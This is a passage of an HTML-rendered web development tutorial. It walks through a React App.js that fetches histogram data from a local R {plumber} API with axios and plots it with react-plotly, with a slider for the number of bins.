&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; responsive&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; /&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;Col&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;Row&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;Container&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;div&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; );
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;export&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;default&lt;/span&gt; App;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="appjs-code-breakdown"&gt;App.js Code Breakdown&lt;/h3&gt;
&lt;p&gt;We will break down the above code to explain the individual elements.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-JSX" data-lang="JSX"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; React from &lt;span style="color:#a5d6ff"&gt;&amp;#39;react&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;bootstrap/dist/css/bootstrap.min.css&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; { Container, Col, Row, Card } from &lt;span style="color:#a5d6ff"&gt;&amp;#39;react-bootstrap&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; axios from &lt;span style="color:#a5d6ff"&gt;&amp;#39;axios&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; Slider from &lt;span style="color:#a5d6ff"&gt;&amp;#39;rc-slider&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;rc-slider/assets/index.css&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; Plot from &lt;span style="color:#a5d6ff"&gt;&amp;#39;react-plotly.js&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; { debounce } from &lt;span style="color:#a5d6ff"&gt;&amp;#39;lodash&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The above imports React components and CSS files from the node packages that we installed through npm, which allows us to use them in our App.js.&lt;/p&gt;
&lt;h3 id="constructor"&gt;Constructor&lt;/h3&gt;
&lt;p&gt;Here we create and open a React component class with a constructor and initialize its state with an empty state object. A constructor is a function that runs when the component is created. We bind our onSliderChange function to the component instance. This binding is necessary to make the keyword &lt;code&gt;&amp;quot;this&amp;quot;&lt;/code&gt; work in the callback, and it allows us to pass the function to a child component (in this case the Slider) as its onChange handler.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-JSX" data-lang="JSX"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;class&lt;/span&gt; App &lt;span style="color:#ff7b72"&gt;extends&lt;/span&gt; React.Component {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; constructor(props) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;super&lt;/span&gt;(props)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.state &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; };
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.onSliderChange &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.onSliderChange.bind(&lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;What is binding for? In JavaScript the following two snippets are not equivalent:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-JS" data-lang="JS"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;obj.method();
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-JS" data-lang="JS"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;var&lt;/span&gt; method &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; obj.method;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;method();
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Binding ensures that the second snippet has the same behaviour as the first one. With React we need to bind the methods that we pass into other components.&lt;/p&gt;
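&lt;p&gt;To make the difference concrete, here is a minimal sketch in plain JavaScript, outside React. The Counter class and its increment method are made up for illustration and are not part of the app. The detached call fails because class bodies run in strict mode, where a function called without an object has an undefined &lt;code&gt;this&lt;/code&gt;.&lt;/p&gt;

```javascript
// Hypothetical class used only to illustrate binding; it is not part of the app.
class Counter {
  constructor() {
    this.count = 0;
  }

  increment() {
    // `this` is whatever object the method was called on.
    this.count += 1;
    return this.count;
  }
}

const counter = new Counter();

// Snippet 1: called through the object, so `this` is `counter`.
const viaObject = counter.increment();

// Snippet 2: the method is detached first, so the call has no receiver.
const detached = counter.increment;
let detachedError = null;
try {
  detached();
} catch (err) {
  // Reading `this.count` fails because `this` is undefined here.
  detachedError = err;
}

// bind() returns a new function whose `this` is permanently set to `counter`.
const bound = counter.increment.bind(counter);
const viaBound = bound();

console.log(viaObject, detachedError instanceof TypeError, viaBound);
```

&lt;p&gt;This is the same situation as passing &lt;code&gt;this.onSliderChange&lt;/code&gt; to the Slider: the child component calls the function on its own, so without the bind in the constructor the call would lose its link to the App instance.&lt;/p&gt;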
&lt;h3 id="onsliderchange"&gt;onSliderChange()&lt;/h3&gt;
&lt;p&gt;The onSliderChange function makes a GET request to our {plumber} API (http://localhost:8000/hist-raw) using axios. We send it a &lt;code&gt;params&lt;/code&gt; object containing the number of &lt;code&gt;bins&lt;/code&gt;, and it sends us back some histogram data.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-JSX" data-lang="JSX"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;async&lt;/span&gt; onSliderChange(input) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;await&lt;/span&gt; axios.get(&lt;span style="color:#a5d6ff"&gt;&amp;#39;http://localhost:8000/hist-raw&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; params&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bins&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; input,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }).then((data) =&amp;gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.setState({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rawdata&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; data.data.map(x =&amp;gt; x[&lt;span style="color:#a5d6ff"&gt;&amp;#34;counts&amp;#34;&lt;/span&gt;]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; data.data.map(x =&amp;gt; x[&lt;span style="color:#a5d6ff"&gt;&amp;#34;mids&amp;#34;&lt;/span&gt;]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;bar&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; });
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Once we receive this data we manipulate it with &lt;code&gt;map()&lt;/code&gt; functions and store the required data within a &lt;code&gt;rawdata&lt;/code&gt; object we have created. This is formatted using the data format required by the Plotly package. This object is stored within the state of the App component using &lt;code&gt;this.setState&lt;/code&gt;.&lt;/p&gt;
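&lt;p&gt;The reshaping step can be tried on its own, without the API or React. The sketch below assumes the response body is an array of rows with &lt;code&gt;mids&lt;/code&gt; and &lt;code&gt;counts&lt;/code&gt; fields, as the code above reads them. The helper name toPlotlyTrace and the sample numbers are made up for illustration.&lt;/p&gt;

```javascript
// Hypothetical helper: turns the parsed API rows into a single Plotly bar trace.
function toPlotlyTrace(rows) {
  return {
    // One entry per histogram bin: midpoints on the x axis, counts on the y axis.
    x: rows.map(function (row) { return row.mids; }),
    y: rows.map(function (row) { return row.counts; }),
    type: 'bar',
  };
}

// Made-up sample rows in the shape that onSliderChange reads from the response.
const sampleRows = [
  { mids: 45, counts: 4 },
  { mids: 55, counts: 22 },
  { mids: 65, counts: 14 },
];

// Plotly expects an array of traces, so the single trace is wrapped in an array.
const rawdata = [toPlotlyTrace(sampleRows)];
console.log(JSON.stringify(rawdata));
```

&lt;p&gt;Keeping the transformation in a small pure function like this makes it easy to check against sample data before wiring it into &lt;code&gt;setState&lt;/code&gt;.&lt;/p&gt;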
&lt;h3 id="react-bootstrap-layout"&gt;react-bootstrap Layout&lt;/h3&gt;
&lt;p&gt;We use the react-bootstrap components &lt;code&gt;Container&lt;/code&gt;, &lt;code&gt;Row&lt;/code&gt;, &lt;code&gt;Col&lt;/code&gt; and &lt;code&gt;Card&lt;/code&gt; to describe the layout and design. Components can appear inside other components, similar to how DOM elements can appear inside other DOM elements in HTML.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-JSX" data-lang="JSX"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; render() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; (
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;div&lt;/span&gt; className&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;App&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Container&lt;/span&gt; fluid&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Row&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Col&lt;/span&gt; md&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;}&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Card&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Card.Body&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Card.Title&lt;/span&gt;&amp;gt;Hello React&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;Card.Title&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Card.Text&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;label&lt;/span&gt; htmlFor&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;bins&amp;#34;&lt;/span&gt; className&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;col-form-label&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Number &lt;span style="color:#ff7b72"&gt;of&lt;/span&gt; bins&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;label&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Slider&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a5d6ff"&gt;&amp;#34;bins&amp;#34;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; onChange&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{debounce(&lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.onSliderChange, &lt;span style="color:#a5d6ff"&gt;60&lt;/span&gt;)}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; min&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; max&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a5d6ff"&gt;50&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; marks&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;1&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;13&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;13&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;26&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;26&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;38&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;38&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;50&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;50&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }}/&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;Card.Text&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;Card.Body&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;Card&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;Col&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Col&lt;/span&gt; md&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;}&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Plot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.state.rawdata}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; layout&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Histogram of waiting times&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bargap&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.01&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; autosize&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; xaxis&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Waiting time to next eruption (in mins)&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; yaxis&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Frequency&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; useResizeHandler&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; responsive&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; /&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;Col&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;Row&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;Container&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;div&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; );
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Some of these components have properties that we can change within their opening tag. For example, the &lt;code&gt;md&lt;/code&gt; property of a column determines its width. More information on the layout properties can be found &lt;a href="https://react-bootstrap.github.io/layout/grid/" rel="external"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="slider"&gt;Slider&lt;/h3&gt;
&lt;p&gt;Within the Card.Text section we have added the slider component with properties to describe it. The part I&amp;rsquo;d like to draw attention to is the onChange property.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-JSX" data-lang="JSX"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#7ee787"&gt;Slider&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a5d6ff"&gt;&amp;#34;bins&amp;#34;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; onChange&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{debounce(&lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.onSliderChange, &lt;span style="color:#a5d6ff"&gt;60&lt;/span&gt;)}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; min&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; max&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a5d6ff"&gt;50&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; marks&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;1&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;13&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;13&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;26&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;26&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;38&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;38&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;50&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;50&amp;#39;&lt;/span&gt;
